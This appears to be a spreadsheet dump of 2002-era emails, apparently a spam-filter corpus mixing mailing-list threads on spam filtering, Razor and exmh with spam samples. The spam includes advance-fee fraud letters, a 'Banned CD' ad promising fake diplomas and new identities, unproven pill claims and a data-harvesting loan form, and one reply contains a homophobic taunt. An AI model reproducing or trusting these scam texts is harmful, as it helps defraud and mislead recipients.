 This was in confidence considering my present circumstance and situation. I escaped along with my husband and two of our sons James Kongolo and Nzanga out of Democratic Republic of Congo (DRC) to Abidjan, Coted'ivoire where my family and I settled, while we later moved to settled in Morroco where my husband later died of cancer disease. However, due to this situation we decided to change most of my husband's billions of dollars deposited in Swiss bank and other countries into other forms of money coded for safe purpose because the new head of state of (Dr) Mr Laurent Kabila has made arrangement with the Swiss government and other European countries to freeze all my late husband's treasures deposited in some european countries. 
 Hence, my children and I decided laying low in Africa to study the situation
 till when things gets better. Like now that president Kabila is dead and the son taking over
 (Joseph Kabila). One of my late husband's chateaux in Southern France was confiscated by the french government, and as such I had to change my identity so that my investment will not be traced and confiscated.I have deposited the sum Eighteen Million United State
 Dollars (US$18,000,000,00.) With a security company for safe keeping. What I want you to do is to indicate yourinterest that you can assist us in receiving the money on our behalf, so that I can introduce you to my son (Kongolo) who has the out modalities for the claim
 of the said funds. I want you to assist in investing this money, but I will not want my identity revealed.I will also want to acquire real/landed properties and
 stock in multi-national companies and to engage in other safe and non-speculative investments as adviseby your good self. May I at this point emphasize the high level of
 confidentiality, which this upcoming project demands,and hope you will not betray the trust and
 confidence, which I repose in you.In conclusion, if you want to assist us, my son (Kongolo) shall divulgeto you all briefs regarding this project, tell you where
 the funds are currently being maintained and also discuss remuneration for your services.For this reason kindly furnish us your contact information,that is your personal telephone and fax number for validation purpose and acknowledge receipt of this mail using the above email address.
 Yours sincerely,
 Mrs. Mariam M. Seseseko.
 -- 
 Irish Linux Users' Group Social Events: social@linux.ie
 http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">[Barry A. Warsaw, gives answers and asks questions]
 Here's the code that produced the header tokens:
     x2n = {}
     for x in msg.keys():
         x2n[x] = x2n.get(x, 0) + 1
     for x in x2n.items():
         yield "header:%s:%d" % x
 Some responses:
 &gt;  0.01    19  3559 'header:X-Mailman-Version:1'
 &gt;  0.01    19  3559 'header:List-Id:1'
 &gt;  0.01    19  3557 'header:X-BeenThere:1'
 &gt;
 &gt; These three are definitely MM artifacts, although the second one
 &gt; /could/ be inserted by other list management software (it's described
 &gt; in an RFC).
 Since all the ham came from Mailman, and only 19 spam had it, it's quite
 safe to assume then that I should ignore these for now.
 &gt;  0.01     0  3093 'header:Newsgroups:1'
 &gt;  0.01     0  3054 'header:Xref:1'
 &gt;  0.01     0  3053 'header:Path:1'
 &gt;
 &gt; These aren't MM artifacts, but are byproducts of gating a message off
 &gt; of an nntp feed.  Some of the other NNTP-* headers are similar, but I
 &gt; won't point them out below.
 I should ignore these too then.
 &gt;  0.01    19  2668 'header:List-Unsubscribe:1'
 &gt;  0.01    19  2668 'header:List-Subscribe:1'
 &gt;  0.01    19  2668 'header:List-Post:1'
 &gt;  0.01    19  2668 'header:List-Help:1'
 &gt;  0.01    19  2668 'header:List-Archive:1'
 &gt;
 &gt; RFC recommended generic listserve headers that MM injects.
 Ditto.
 &gt; So why do you get two entries for this one?
 &gt;
 &gt;  0.99   519     0 'header:Received:8'
 &gt;  0.99   466     1 'header:Received:7'
 Read the code &lt;wink&gt;.  The first line counts msgs that had 8 instances of a
 'Received' header, and the second counts msgs that had 7 instances.  I
 expect this is a good clue!  The more indirect the mail path, the more of
 those thingies we'll see, and if you're posting from a spam trailer park in
 Tasmania you may well need to travel thru more machines.
 &gt; ...
 &gt; Note that header names are case insensitive, so this one's no
 &gt; different than "MIME-Version:".  Similarly other headers in your list.
 Ignoring case here may or may not help; that's for experiment to decide.
 It's plausible that case is significant, if, e.g., a particular spam mailing
 package generates unusual case, or a particular clueless spammer
 misconfigures his package.
 &gt;  0.02    65  3559 'header:Precedence:1'
 &gt;
 &gt; Could be Mailman, or not.  This header is supposed to tell other
 &gt; automated software that this message was automated.  E.g. a replybot
 &gt; should ignore any message with a Precedence: {bulk|junk|list}.
 Rule of thumb:  if Mailman inserts a thing, I should ignore it.  Or, better,
 I should stop trying to out-think the flaws in the test data and get better
 test data instead!
 &gt;  0.50     4     0 'header:2:1'
 &gt;
 &gt; !?
 &gt; ...
 &gt;  0.50     0     2 'header:'
 &gt;
 &gt; Heh?
 I sucked out all the wordinfo keys that began with "header:".  The last line
 there  was probably due to unrelated instances of the string "header:" in
 message bodies.  Harder to guess about the first line.
 &gt; ...
 &gt; Some headers of course are totally unreliable as to their origin.  I'm
 &gt; thinking stuff like MIME-Version, Content-Type, To, From, etc, etc.
 &gt; Everyone sticks those in.
 The brilliance of Anthony's "just count them" scheme is that it requires no
 thought, so can't be fooled &lt;wink&gt;.  Header lines that are evenly
 distributed across spam and ham will turn out to be worthless indicators
 (prob near 0.5), so do no harm.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [Razor-users] Using Razor with non-mbox files
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; ----- Original Message -----
 &gt; Date: Thu, 08 Aug 2002 11:58:36 -0400
 &gt; From: wertzscott@cs.com
 &gt; To: razor-users@example.sourceforge.net
 &gt; Subject: [Razor-users] Using Razor with non-mbox files
 &gt;
 &gt; Greetings!  I'm new to this list, and new to Razor.  Trying to get it to
 compile now (perhaps more on that later), but I'm wondering if it can really
 do what I need anyway.  In short my question is whether Razor can process
 files directly from sendmail's queues.  Here's the situation.
 &gt;
 You can use a milter with sendmail that will add an X-header labeling the
 mail as spam for procmail processing later (see smrazor:
 http://www.sapros.com/smrazor/ ). You can modify the .c file to reject the
 email instead. I have been using this with sendmail 8.12.5 and Solaris 9
 with razor-agents 2.14 quite successfully (barring network/catalogue server
 issues) ...
 Sven
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 9 Sep 2002, Lucas Gonze wrote:
 --]3K is utter shite.
 --]
 3k is a number that probably sounds good to some closted  homophobe with
 secret desires to be "belle of the balls". Twinks dinks and dorks, this
 thread sounds to me like someone needs a little luvin.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG-Social] prirodu requiremus social sample
</t>
  </si>
  <si>
    <t xml:space="preserve">
 social
 On January 1st 2002, the European countries began
 using the new Euro.  Never before have so
 many countries with such powerful economies united
 to use a single currency.  Get your piece of history
 now!  We would like to send you a FREE Euro
 and a FREE report on world currency.  Just visit
 our site to request your Euro and Euro report:
 http://www.justaclick-supersite.com/euro/
 In addition to our currency report, you can receive
 our FREE INVESTMENT PACKAGE:
 *  Learn how $10,000 in options will leverage $1,000,000 in
 Euro Currency. This means even a small movement in the market
 has huge profit potential. csice
 If you are over age 18 and have some risk capital, it's
 important that you find out how the Euro will
 change the economic world and how you can profit!
 http://www.justaclick-supersite.com/euro/
 Please carefully evaluate your financial position before
 trading.  Only risk capital should be used.
 8C43FD25CB6F949944EE12C379E50028
 UTBXCUHEPUFFBNKWQ
 Full opt-out instructions on the bottom of the site
 -- 
 Irish Linux Users' Group Social Events: social@linux.ie
 http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: =?big5?Q?=A7K=B6O=B5L=AD=AD=A6=B8=A5=F4=A5=B4=A4=A4=B4=E4=AA=F8=B3~=B9q=B8=DC?=
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Brown accused of backtracking on regional museums
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8723997,215/
 Date: 2002-10-10T03:26:54+01:00
 *Arts:* Curators despair at 'shortfall' in chancellor's funding.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: The Freedom Rides
</t>
  </si>
  <si>
    <t xml:space="preserve">        Forgotten History - Tuesday, August 20, 2002 
         "Little known facts and overlooked history" 
 ============================================================ 
 Want to become a Forgotten History subscriber for FREE? Visit: 
            http://www.shagmail.com/sub/history.html 
 ============================================================ 
             - Do you enjoy this publication? -
 Then give your friends a FREE GIFT SUBSCRIPTION to it today. 
 Just click below and "Shag-a-Friend"! 
 http://www.sendoutmail.com/shag_friend2.asp?l=history
  &lt;a href="http://www.sendoutmail.com/shag_friend2.asp?l=history"&gt; 
 Give a Gift Subscription! &lt;/a&gt;
 ============================================================ 
 AOL users: look for your links at the bottom of the page. 
 ------------------------------------------------------------ 
            -  WTC Commemorative Pin  -
              * We Will Never Forget *
 This September we will remember what once stood
 in the heart of New York and all of the precious lives 
 that were lost. Here is an opportunity to show that your 
 patriotism is as strong today as it was one year ago.  
 We are giving a FREE American Flag and a FREE American
 Flag Pin with every order for the WTC Commemorative Pin. 
 You can order you WTC Commemorative Pin today for $29.99.
 Order today!
          http://ads.pulsetv.com/al/a?aid=521&amp;ent=533
 &lt;a href="http://ads.pulsetv.com/al/a?aid=521&amp;ent=533"&gt;
 Click Here&lt;/a&gt;
 ------------------------------------------------------------
 The Freedom Rides
 By Denis Mueller
 At the end of World War II, the United States was a rigidly 
 segregated country but there were cracks beginning to show. 
 In 1946, the Supreme Court ruled that ruled that segregated 
 seating on interstate transportation was illegal. In 1947, 
 the Congress of Racial Equality (CORE) decided to challenge 
 the racist system. The opposition was fierce and the riders 
 were jailed often ending up on chain gangs.
 By 1961, the time was right to challenge America's Jim Crow 
 laws and CORE proposed the "Freedom Rides." CORE felt that 
 they could count on the racists to oppose the rides thereby 
 creating a crisis that would force the Federal Government to 
 intervene to enforce the law. It would be dangerous and CORE 
 members knew that they were risking their lives, but as CORE 
 director James Farmer maintained they were ready.  "When we 
 began the ride I think all of us were prepared for as much 
 violence as could be thrown at us. We were prepared for the 
 possibility of death."
 ------------------------------------------------------------ 
             * S E X...S E X...S E X...S E X *
             NOW THAT WEVE GOT YOUR ATTENTION...
 Introducing GREAT SEX -- the ONLY pill of its kind fortified 
 with nature's most POTENT MOOD ENHANCERS. Unleashes the 
 uncontrollable passion hidden deep inside. Unlike Costly 
 "drugstore" formulas GREAT SEX is:
 - Available now WITHOUT doctor's prescription! 
 - For BOTH men and women! 
 - Costs just PENNIES per capsule 
 - Can be used as often as desired 
 - Has NO unwanted side-effects 
 Don't wait, put the physical desire back into your love life.
 Order now for only $14.99, or SAVE on 2 or more by visiting:
           http://ads.pulsetv.com/al/a?aid=521&amp;ent=651
  &lt;a href="http://ads.pulsetv.com/al/a?aid=521&amp;ent=651"&gt;
 AOL Users Click Here&lt;/a&gt;
 ------------------------------------------------------------ 
 On May 4th, 1961 they set out to New Orleans. In the upper 
 south they met no resistance but by the time they got to 
 Alabama they were met by an angry band of terrorists who 
 slashed the tires and burned the bus. In Birmingham it was 
 worse. The FBI, through its informant James Rowe, were well 
 aware that the Ku Klux Klan was waiting for them. So were 
 the Birmingham police, led by Chief of police Bull Conner, 
 and when they arrived they were severely beaten. 
 Despite the warnings there were no police to protect them. 
 Governor Patterson showed no mercy and blamed the riders. 
 So the terrorist attacks went on. The "Freedom Riders" were 
 determined to continue and were joined by a group of Nash-
 ville students. They were met by hostility and were arrested 
 and sent back to Tennessee. But the riders were fearless and 
 immediately returned to Birmingham ready to continue the 
 journey.
 ------------------------------------------------------------ 
    ---------&gt; The Paranormal Insider Is Here! &lt;---------
 ShagMail is PROUD to introduce our one and only paranormal 
 investigator, Gus. Once a week he will explore the most 
 intriguing cases of paranormal incidents reported. ESP, alien 
 sightings, angels, ghosts and much more. Every issue is a gem!
 To subscribe to this for FREE just click on the link below.
 	 http://www.shagmail.com/welcome.fc?15004
 &lt;a href="http://www.shagmail.com/welcome.fc?15004"&gt;
 Subscribe to The Paranormal Insider for FREE&lt;/a&gt;
 ------------------------------------------------------------ 
 Meanwhile, their plight became international news and 
 "Freedom Riders" left Birmingham on May 20th determined to 
 continue. State officials had promised Attorney General Robert 
 Kennedy they would be protected, but by the time they reached 
 Montgomery there were no state police in sight. Seeing a mob, 
 the riders feared for their lives, but Jim Zwerg, a white man, 
 bravely walked out of the bus and was nearly beaten to death. 
 He still suffers from the effects but his courage was un-
 deniable. Others including Justice Department official John 
 Seigenthaler were also beaten.
 The situation seemed to be out of control and federal inter-
 vention finally saved the day with Governor Patterson declar-
 ing martial law. Robert Kennedy called for a cooling off 
 period but the riders refused. They would continue on. So 
 they set off to Jackson, Mississippi but  Kennedy had made a 
 deal with Mississippi officials. They were supposed to be 
 protected, but upon arriving they were arrested. Kennedy had 
 caved in. It was a cowardly decision by the Attorney General 
 and the riders were sentenced for 60 days for exercising 
 their constitutional rights. They never finished their trip 
 but their courage showed the power of civil disobedience and 
 in the end justice would prevail and terrorism would be 
 defeated. It is another example of how people change things, 
 not government officials.
 Sources: Eyes on the Prize
 ------------------------------------------------------------ 
 Questions...Comments..Email us at: mailto:denis@shagmail.com 
 &lt;a href="mailto:denis@shagmail.com"&gt;Email Forgotten History&lt;/a&gt; 
 ************************************************************ 
 To SUBSCRIBE visit: http://www.shagmail.com/sub/history.html 
 *** 
 To UNSUBSCRIBE visit: http://www.shagmail.com/unsub/history.html 
 *** 
 Want some Fun and Amusements in your email box FREE! Visit: 
                  http://www.shagmail.com 
 ------------------------------------------------------------ 
                        AOL Links 
 ------------------------------------------------------------ 
 &lt;a href="http://www.shagmail.com/sub/history.html"&gt;Subscribe&lt;/a&gt; 
 &lt;a href="http://www.shagmail.com/unsub/history.html"&gt;Unsubscribe&lt;/a&gt; 
 &lt;a href="http://www.shagmail.com"&gt;More FREE Fun and Amusements&lt;/a&gt; 
 ____________________________________________________________ 
 END OF FORGOTTEN HISTORY 
 Copyright 2002 by Pulse Direct, Inc. All rights reserved. 
 Feel free to forward this, in its entirety, to others.
 ---
 You are currently subscribed to history as: mothlight@fastmail.fm
</t>
  </si>
  <si>
    <t xml:space="preserve">Yannick Gingras wrote:
 &gt; Is the use of "trusted hardware" really worth it ?  Does it really make it 
 &gt; more secure ?  Look at the DVDs.
 DVDs don't use trusted hardware. As for whether it is worth it, that 
 depends entirely on what its worth to secure your software.
 Cheers,
 Ben.
 -- 
 http://www.apache-ssl.org/ben.html       http://www.thebunker.net/
 "There is no limit to what a man can do or how far he can go if he
 doesn't mind who gets the credit." - Robert Woodruff
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, 1 Sep 2002 bitbitch@magnesium.net wrote:
 &gt; Well Beberg, unless you're really into Anime and actually hold true
 &gt; that dead people can send email, I think Geege's subject is just dandy.
 &gt; Especially since she removed herself from the hive that is aol (and
 &gt; placed herself unto another, but hey :-))
 Bandwidth is bandwidth. AOL is still the only mom-friendly place to get it.
 &gt; *ducks and runs*
 What, like i'm not skilled with a bow? You better run really fast :-P
 &gt; (bonus FoRK points if Adam knows what anime i'm refering to)
 Well lets see, about 99% of all anime? In anime dead people can talk, email,
 hang out, and generally lead normal lives. Come to think of it they tend to
 be the primary characters ;)
 But I suspect you mean Serial Experiments Lain, in which the initial "i'm
 not dead yet" is via email.
 - Adam L. "Duncan" Beberg
   http://www.mithral.com/~beberg/
   beberg@mithral.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Headlines for 2002-10-08
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Headline Mailer
 This Week on perl5-porters (30 September / 6 October 2002)
     posted by rafael on Monday October 07, @07:12 (summaries)
     http://use.perl.org/article.pl?sid=02/10/07/1124226
 RATS
     posted by KM on Monday October 07, @09:01 (news)
     http://use.perl.org/article.pl?sid=02/10/07/132252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</si>
  <si>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Toners and inkjet cartridges for less....          GHOE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</si>
  <si>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rpd
</t>
  </si>
  <si>
    <t xml:space="preserve">*****************BANNEDCD::::::::::::::::::::::::::::::::::&gt;NET******************
 I have been receiving emails saying that I'm contributing to the "moral decay of society" by selling the Banned CD.  That may be, but I feel strongly that you have a right to benefit from 
 this hard-to-find information. 
 So I am giving you ONE LAST CHANCE to order the Banned CD! 
 With this powerful CD, you will be able to investigate your friends, enemies and lovers in just minutes using the Internet.  You can track down old flames from college, or you can dig up some dirt on your boss to make sure you get that next promotion! 
 Or maybe you want a fake diploma to hang on your bedroom wall.  You'll find addresses for companies that make these diplomas on the Banned CD. 
 Need to disappear fast and never look back?  No problem! 
 Using the Banned CD, you will learn how to build a completely 
 new identity. 
 Obviously, the Powers That Be don't want you to have the Banned CD.  They have threatened me with lawsuits, fines, and even imprisonment unless I stop selling it immediately. But I feel that YOU have a Constitutional right to access this type of information, and I can't be intimidated. 
  Uncle Sam and your creditors are horrified that I am still selling this product!  There must be a price on my head! 
 Why are they so upset? Because this CD gives you freedom. 
 And you can't buy freedom at your local Walmart.  You will 
 have the freedom to avoid creditors, judgments, lawsuits, IRS 
 tax collectors, criminal indictments, your greedy ex-wife or 
 ex-husband, and MUCH more!
 Please Click the URL for the Detail! 
 http://%32%317.%31%30%36.%355%2E97
 {%RAND%}
 You are receiving this special offer because you have provided permission to receive third party email communications regarding special online promotions or offers. We strongly oppose the use of SPAM email and do not want to send our mailings to anyone who does not wish to receive them. If you do not wish to receive any further messages from netcommission. To Be Removed From Our List, 
 http://%32%317.%31%30%36.%355%2E97/remove.html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</si>
  <si>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&gt; From: Tony Nugent &lt;tony@linuxworks.com.au&gt;
 &gt; Sender: exmh-users-admin@spamassassin.taint.org
 &gt; Date: Fri, 13 Sep 2002 21:30:34 +1000
 &gt; 
 &gt; On Fri Sep 13 2002 at 17:55, Robert Elz wrote:
 &gt; 
 &gt; &gt;     Date:        Fri, 13 Sep 2002 11:26:30 +1000
 &gt; &gt;     From:        Tony Nugent &lt;tony@linuxworks.com.au&gt;
 &gt; 
 &gt; &gt;   | I can cut'n'paste from exmh's message display window into spawned
 &gt; &gt;   | gvim processes, but not into anything else.
 &gt; &gt; 
 &gt; &gt; That's odd.  I cut &amp; paste between all kinds of windows (exmh into
 &gt; 
 &gt; Not so odd, this issue came up several weeks ago (with no real
 &gt; resolution).
 &gt; 
 &gt; &gt; mozilla, xterm, another wish script of mine I use for DNS tasks (but
 &gt; &gt; that one I guess is to be expected) netscape (when I used to use it,
 &gt; &gt; but I suppose it and mozilla are the same codebase, approx) - in fact
 &gt; &gt; I can't thing of anything it fails for, that I have noticed.
 &gt; &gt; 
 &gt; &gt; What is an example of an "anything else" that it fails for for you?
 &gt; 
 &gt; Everything else :)  I can't even mark text in an exmh message window
 &gt; and then paste it into a terminal window, the cut buffer seems to be
 &gt; completely empty (and its previous contents are no longer there
 &gt; either).
 &gt; 
 &gt; &gt; kre
 &gt; 
 &gt;   BTW: talking of spring downunder... I'm in Queensland.  It almost
 &gt;   feels like early summer already (winters here are dry and warm,
 &gt;   much better than cold wet miserable Melbourne :-)  Despite some
 &gt;   recent rain (first in months), we are already into a drought, with
 &gt;   an El-Nino on the way it is only going to get worse...  (the last
 &gt;   one in the 90s caused one of the worst droughts ever seen here in
 &gt;   aussie).
 (This is all guess work and may be bogus.)
 Are you running Gnome 1.4? I had similar problems as did several
 co-workers. Updating my Gnome components has fixed it for me and
 others, although I can't say exactly which component did the
 trick. Gnomecore or gtk would seem most likely, but it may have been
 something else.
 In any case, I have not seen the problem for quite a while, now.
 R. Kevin Oberman, Network Engineer
 Energy Sciences Network (ESnet)
 Ernest O. Lawrence Berkeley National Laboratory (Berkeley Lab)
 E-mail: oberman@es.net			Phone: +1 510 486-8634
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: asap
</t>
  </si>
  <si>
    <t xml:space="preserve">--===_SecAtt_000_1fuklemuttfusq
 Content-Type: text/plain; charset="us-ascii"
 Content-Transfer-Encoding: quoted-printable
 Aluko Martin
 23 victoriaGarden city=2C
 lagos-Nigeria=2E
 Attn=2E
 We have an immediate business proposal that involves US$34=2C700=2C000
 which we will like to invest under your custody=2E Please=2C do not
 hesitate
 to send me an email=2C so as to discuss with you the details of the
 transaction=2Fthe
 terms and condition of sharing regarding the business=2E
 Your urgent response will be highly appreciated and will swiftly
 bring us
 to the commencement of the transaction=2E We hope to conclude this
 transaction
 within 10-12 working days=2E Do not forget to contact me on receipt of
 this
 mail=2E And please ensure to maintain absolute confidentiality with
 regard to
 this
 pending transaction=2E I urgently await your response=2E
 Best Regards=2C
 Aluko Martin=2E
 -- 
 --===_SecAtt_000_1fuklemuttfusq
 Content-Type: application/octet-stream; name="MailXS_list.lst"
 Content-Transfer-Encoding: base64
 Content-Disposition: attachment; filename="MailXS_list.lst"
 --===_SecAtt_000_1fuklemuttfusq
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] Scissors are a snip for Third World
</t>
  </si>
  <si>
    <t xml:space="preserve">The Times
  September 06, 2002
  Scissors are a snip for Third World
  From Richard Owen in Rome
  IT IS one of the unanswered questions of the past year: what happens to the
  millions of nail scissors confiscated by airport security officials from
  passengers hand luggage? Most are thrown away or recycled after being seized
  as part of security measures since September 11. But an enterprising chaplain
  is sending them to Catholic missionaries for distribution to Third World
  hospitals and clinics. In theory travellers who have left nail scissors, nail
  files, corkscrews or manicure sets from their hand luggage can arrange for
  them to be returned. In practice many just shrug and leave the scissors by the
  X-ray scanners. 
  Father Arturo Rossini, chaplain of Malpensa airport in Milan, said that
  scissors were costly or unavailable in many parts of Africa, Asia and Latin
  America. 
  He told Corriere della Sera that he had plucked up the courage to ask the
  authorities if he could have the confiscated scissors. With the help of a
  retired airport policeman, he had packaged 60,000 nail scissors and manicure
  sets, using the airport chapel as a packing centre. 
  Packages were shipped in aircraft holds to Peru, Brasil, India, Mozambique,
  Argentina, Zambia and Kenya. In such countries, what we think of as a
  personal grooming accessory can be a vital tool. 
  The idea has been taken up at other Italian airports. 
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 Plan to Sell a Home?
 http://us.click.yahoo.com/J2SnNA/y.lEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] Big cats 'on the increase'
</t>
  </si>
  <si>
    <t xml:space="preserve">http://news.bbc.co.uk/1/hi/uk/2220922.stm
 Big cats are on the loose in Britain and breeding their way towards record
 numbers, a monitoring group has claimed. 
 The British Big Cats Society said it has received more than 800 reports of
 animals including pumas, black panthers, leopards and so-called Fen tigers
 over the past 12 months. 
 And while it admits that many sightings are of nothing more exotic than the
 average moggy, it claims to have "firm evidence" that the majority are real.
 Society founder Daniel Bamping told BBC News Online he could cope with the
 critics and doubters, adding: "I was a sceptic, I thought it was in the same
 realm as the Loch Ness monster. 
 "But it's not, they are really out there." 
 'Cats with cubs' 
 Mr Bamping said there have been reports of big cats from every corner of the
 country. 
 Big cat reports  
 Hotspots include Scotland and Gloucestershire 
 January 2002 - Kent man clawed by suspected Lynx 
 November 2001 - farmer reports animals mauled by big cat 
 April 2001 - Lynx captured in north London 
 1999 - Puma-like cat attacks horse in Wales  
 "This weekend alone I have had sightings from Wales, the Scottish borders,
 Kent, the West Midlands, Devon, Somerset and Wiltshire," he said. 
 The society claims some of the big cats are breeding with domestic animals. 
 But Mr Bamping said others, particularly lynx and puma, probably exist in
 sufficient numbers to breed among themselves. 
 "We have had sightings of cats with cubs," he added. 
 'Trigger camera' 
 The society claims to have evidence proving the cats' existence, including
 photographs, paw prints, sheep kills and hair samples. 
 But it knows it will have to do even more to convince a sceptical public
 that it is not spinning them a shaggy cat story. 
 A national "trigger camera" project is planned which, the society hopes,
 will provide footage to prove the existence of the big cats. 
 Mr Bamping said: "The idea is that the cat will walk past the camera and
 take a picture of itself." 
 'Like dogs' 
 The society believes many of the sighting are of pets released into the
 wild, or their descendants. 
 Its spokesman Danny Nineham said: "In the 1960s and 1970s, people had big
 cats like leopards as pets and they used to walk them like dogs. 
 "But in 1976 when the Dangerous Wild Animals Act came into force, people
 released their cats because they did not want to pay for a licence, put them
 down, or take them to a zoo."
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 4 DVDs Free +s&amp;p Join Now
 http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Cast not the first stone
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/02.html#cast_not_the_first_stone
 Date: 2002-10-02T09:30:52-05:00
 First Blood is Spilled at Record Industry Hearings[1]. &amp;#8220;In a shocking 
 statement made by Back Street Boy, Kevin Richardson, he testified that they 
 have NEVER received a royalty check, and that they only took a large advance 
 after their third hit album in a row failed to earn them a penny in 
 royalties.&amp;#8221;
 [1] http://www.musicdish.com/mag/?id=6675
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Hi Joseph, here is my personal information you wanted P
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;
 &lt;BODY&gt;
 &lt;CENTER&gt;
 &lt;TABLE borderColor=3D#000000 cellSpacing=3D0 cellPadding=3D5 width=3D540 b=
 gColor=3D#ffffff 
 border=3D2&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle width=3D"100%"&gt;
       &lt;DIV align=3Dcenter&gt;
       &lt;TABLE height=3D429 cellSpacing=3D0 cellPadding=3D0 width=3D530 bord=
 er=3D0&gt;
         &lt;TR&gt;
           &lt;TD align=3Dmiddle width=3D"100%" height=3D19&gt;&lt;IMG 
             alt=3D"" 
             src=3D"http://www.marketing-mission.net/sb/images/m2_adcopy.jp=
 g" 
             border=3D0&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dmiddle width=3D"100%" height=3D19&gt;
             &lt;DIV align=3Dcenter&gt;
             &lt;TABLE cellSpacing=3D0 cellPadding=3D4 width=3D420 bgColor=3D#=
 666699 
             border=3D0&gt;
               &lt;TR&gt;
                 &lt;TD align=3Dmiddle width=3D"100%"&gt;
                   &lt;P 
                   style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; WORD-SPACI=
 NG: 0px" 
                   align=3Dcenter&gt;&lt;B&gt;&lt;FONT face=3DArial color=3D#ffffff siz=
 e=3D4&gt;Request 
                   a&lt;U&gt; FREE&lt;/U&gt; loan evaluation. &lt;A"&gt;&amp;nbsp;&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;
                   &lt;P 
                   style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; WORD-SPACI=
 NG: 0px" 
                   align=3Dcenter&gt;&lt;B&gt;&lt;FONT face=3DArial color=3D#ffffff 
                   size=3D4&gt;&lt;U&gt;Apply&lt;/U&gt; now, we will find you 
                   the&lt;BR&gt;LOWEST RATE 
             GUARANTEED!&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dmiddle width=3D"100%" height=3D19&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dleft width=3D"100%" height=3D211&gt;
             &lt;DIV align=3Dcenter&gt;
             &lt;TABLE height=3D1363 cellSpacing=3D0 cellPadding=3D0 width=3D5=
 00 border=3D0&gt;
               &lt;TR&gt;
                 &lt;TD width=3D"100%" height=3D136&gt;&lt;B&gt;&lt;FONT face=3D"Arial, Ve=
 rdana" 
                   color=3D#000000 size=3D3&gt;&amp;nbsp;&amp;nbsp; We are a national =
 mortgage 
                   lender referral service who specializes in helping peopl=
 e like 
                   you get the loans you need to:&lt;/FONT&gt;&lt;/B&gt; 
                   &lt;UL&gt;
                     &lt;LI&gt;&lt;FONT face=3DVerdana size=3D2&gt;Pay off bills and st=
 op 
                     creditors from calling&lt;/FONT&gt; 
                     &lt;LI&gt;&lt;FONT face=3DVerdana size=3D2&gt;Make those long need=
 ed home 
                     improvements&lt;/FONT&gt; 
                     &lt;LI&gt;&lt;FONT face=3DVerdana size=3D2&gt;Refinance your home =
 at a 
                     better rate&lt;/FONT&gt; 
                     &lt;LI&gt;&lt;FONT face=3DVerdana size=3D2&gt;Get cash out for nea=
 rly 
                     anything&lt;/FONT&gt; &lt;/LI&gt;&lt;/UL&gt;&lt;/TD&gt;&lt;/TR&gt;
               &lt;TR&gt;
                 &lt;TD width=3D"100%" height=3D10&gt;&lt;/TD&gt;&lt;/TR&gt;
               &lt;TR&gt;
                 &lt;TD width=3D"100%" height=3D133&gt;&lt;FONT face=3DVerdana 
                   size=3D2&gt;&amp;nbsp;&amp;nbsp; Please complete this brief informa=
 tion 
                   request form. It only takes a few minutes, and there is 
                   absolutely no obligation!&amp;nbsp; All information is kept 
                   strictly confidential! Please complete all information. =
 Thank 
                   you!&lt;/FONT&gt; 
                   &lt;P align=3Dleft&gt;&lt;FONT face=3D"Arial, Verdana"&gt;&lt;STRONG&gt;&lt;F=
 ONT 
                   color=3D#3399ff size=3D2&gt;&amp;nbsp;&lt;/FONT&gt;&lt;FONT color=3D#000=
 000 size=3D3&gt; 
                   Important Reminders&lt;/FONT&gt;&lt;/STRONG&gt;&lt;/FONT&gt; 
                   &lt;UL&gt;
                     &lt;LI&gt;&lt;FONT face=3DVerdana size=3D2&gt;&lt;I&gt;You must have at =
 least 20% 
                     equity in homes value to qualify.&lt;/I&gt;&lt;/FONT&gt; 
